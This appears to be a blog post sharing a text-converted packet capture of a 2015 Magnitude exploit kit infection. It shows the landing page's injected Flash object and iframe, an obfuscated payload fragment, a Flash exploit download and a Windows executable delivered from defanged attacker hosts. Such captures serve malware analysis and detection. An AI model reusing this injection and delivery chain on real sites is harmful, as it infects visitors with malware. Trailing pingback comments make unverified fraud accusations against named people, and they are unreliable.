Magnitude EK Web Based Exploit Kit FLASH Vulnerability PCAP Converted Sample

By | June 22, 2015

2015-02-12 20:49:12.374714 IP 192.168.198.136.49482 > 46.166.182.101.80: Flags [P.], seq 1:749, ack 1, win 64240, length 748
E…’.@…c……..e.J.P….9.X”P…|…GET /?2654434052544748554a47524308414949414a430845494b hxxp/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: [redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: 49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in
2015-02-12 20:49:12.374852 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [.], ack 749, win 64240, length 0
E..(=}………e…..P.J9.X”….P………….
2015-02-12 20:49:22.076146 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [P.], seq 1:784, ack 749, win 64240, length 783
E..7@……….e…..P.J9.X”….P…….hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:48:50 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 581
Connection: close
Content-Type: text/html
<object type=”application/x-shockwave-flash” data=”hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/d8b7bd0646ae4b7344ff9e7df3b77f36″ allowScriptAccess=”always” width=”410″ height=”53″>
<param name=”movie” value=”hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/d8b7bd0646ae4b7344ff9e7df3b77f36″><param name=”play” value=”true”>
</object>
<iframe src=’hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/1db70f31658d04615bd2ac4751bf6c54′ width=410 height=53></iframe>

2015-02-12 20:49:22.076574 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [FP.], seq 784, ack 749, win 64240, length 0
E..(@……….e…..P.J9.[1….P………….
2015-02-12 20:49:22.076692 IP 192.168.198.136.49482 > 46.166.182.101.80: Flags [F.], seq 749, ack 784, win 63457, length 0
E..(‘.@…f……..e.J.P….9.[1P………….
2015-02-12 20:49:22.076768 IP 192.168.198.136.49482 > 46.166.182.101.80: Flags [.], ack 785, win 63457, length 0
E..(‘.@…f……..e.J.P….9.[2P………….
2015-02-12 20:49:22.077227 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [.], ack 750, win 64239, length 0
E..(@……….e…..P.J9.[2….P………….
2015-02-12 20:49:22.130215 IP 192.168.198.136.49483 > 46.166.182.101.80: Flags [S], seq 3311956056, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4′.@…f……..e.K.P.hpX…… ..|…………..
2015-02-12 20:49:22.130411 IP 192.168.198.136.49484 > 46.166.182.101.80: Flags [S], seq 2998898249, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4’.@…f……..e.L.P…I…… ..3…………..
2015-02-12 20:49:22.266404 IP 46.166.182.101.80 > 192.168.198.136.49483: Flags [S.], seq 801925096, ack 3311956057, win 64240, options [mss 1460], length 0
E..,@……….e…..P.K/.g..hpY`………….
2015-02-12 20:49:22.266638 IP 192.168.198.136.49483 > 46.166.182.101.80: Flags [.], ack 1, win 64240, length 0
E..(‘.@…f……..e.K.P.hpY/.g.P………….
2015-02-12 20:49:22.267397 IP 192.168.198.136.49483 > 46.166.182.101.80: Flags [P.], seq 1:502, ack 1, win 64240, length 501
E…’.@…d……..e.K.P.hpY/.g.P…….GET /d8b7bd0646ae4b7344ff9e7df3b77f36 hxxp/1.1
Accept: */*
Referer: hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/?2654434052544748554a47524308414949414a430845494b
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in
Connection: Keep-Alive
2015-02-12 20:49:22.268047 IP 192.168.198.136.49484 > 46.166.182.101.80: Flags [P.], seq 1:690, ack 1, win 64240, length 689
E…’.@…d1…….e.L.P…J),s.P…dc..GET /1db70f31658d04615bd2ac4751bf6c54 hxxp/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/?2654434052544748554a47524308414949414a430845494b
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in
Connection: Keep-Alive
2015-02-12 20:49:22.268164 IP 46.166.182.101.80 > 192.168.198.136.49484: Flags [.], ack 690, win 64240, length 0
E..(@……….e…..P.L),s…..P….Z……..
2015-02-12 20:49:22.413671 IP 46.166.182.101.80 > 192.168.198.136.49484: Flags [P.], seq 1:1370, ack 690, win 64240, length 1369
E…A……(…e…..P.L),s…..P…B…hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:49:00 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 101668
Connection: close
Content-Type: text/html
2015-02-12 20:49:22.415757 IP 46.166.182.101.80 > 192.168.198.136.49484: Flags [P.], seq 11136:12505, ack 690, win 64240, length 1369
E…A…… …e…..P.L),.G….P…Q…*141*150*127*177*144*191*162*155*151*192*124*128*150*112*177*161*123*192*172*123*194*183*145*159*124*153*175*141*126*174*176*125*141*143*155*174*127*175*180*128*174*123*160*154*195*151*187*180*175*156*165*130*191*145*156*124*191*191*160*155*123*130*131*188*142*123*162*163*146*187*123*189*129*143*184*155*193*172*183*128*183*148*144*161*187*176*143*180*129*142*123*128*196*159*123*141*141*159*176*123*174*188*158*123*164*172*187*127*182*107*161*143*145*130*177*162*128*196*174*143*160*180*147*143*193*145*126*132*142*173*124*146*187*157*190*123*172*129*183*155*172*143*191*162*152*125*123*191*174*147*182*132*187*162*182*154*177*126*112*123*124*142*124*192*179*183*142*186*188*131*129*160*187*126*156*157*143*155*177*176*112*155*158*159*188*161*123*194*187*150*191*128*159*177*143*124*126*144*127*159*162*153*175*164*130*187*164*155*173*123*190*193*159*196*183*181*185*164*156*160*174*181*144*155*178*177*196*174*192*130*196*127*191*144*145*173*178*154*187*151*158*142*130*187*146*124*184*126*126*123*144*192*123*148*181*178*182*192*177*195*187*174*112*131*142*184*158*148*159*159*190*192*144*128*150*183*176*185*195*146*184*144*155*149*159*149*125*194*124*123*156*146*159*126*177*172*182*127*191*162*191*183*195*186*195*129*141*177*159*187*174*178*143*158*146*176*155*194*143*185*194*185*182*144*128*131*164*149*195*177*126*126*164*128*158*192*155*123*107*155*158*154*
2015-02-12 20:49:22.415762 IP 46.166.182.101.80 > 192.168.198.136.49483: Flags [P.], seq 1:1370, ack 502, win 64240, length 1369
E…A……….e…..P.K/.g..hrNP…….hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:49:00 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 19658
Connection: close
Content-Type: application/x-shockwave-flash
2015-02-12 20:49:26.587638 IP 192.168.198.136.49486 > 46.166.182.101.80: Flags [P.], seq 1:287, ack 1, win 64240, length 286
E..F(.@…e_…….e.N.P…_W,..P…#…GET /?aba053bd1f478e9f58ba3a41492dca6c hxxp/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 46.166.182.101
Connection: Keep-Alive
2015-02-12 20:49:26.587689 IP 46.166.182.101.80 > 192.168.198.136.49486: Flags [.], ack 287, win 64240, length 0
E..(C[…..8…e…..P.NW,…..}P…V………
2015-02-12 20:49:26.736298 IP 46.166.182.101.80 > 192.168.198.136.49486: Flags [P.], seq 1:1370, ack 287, win 64240, length 1369
E…Cn………e…..P.NW,…..}P…j…hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:49:04 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 160768
Connection: close
Content-Type: text/html

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

Share Button

2 thoughts on “Magnitude EK Web Based Exploit Kit FLASH Vulnerability PCAP Converted Sample

  1. Pingback: Margaret Cunniffe and David Brown are Australian Fraudsters based in Melbourne Victoria that deceive real business people via Synergize Vip Vip Club and Connect Network Fundraise but are nothing more than con-artists.

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *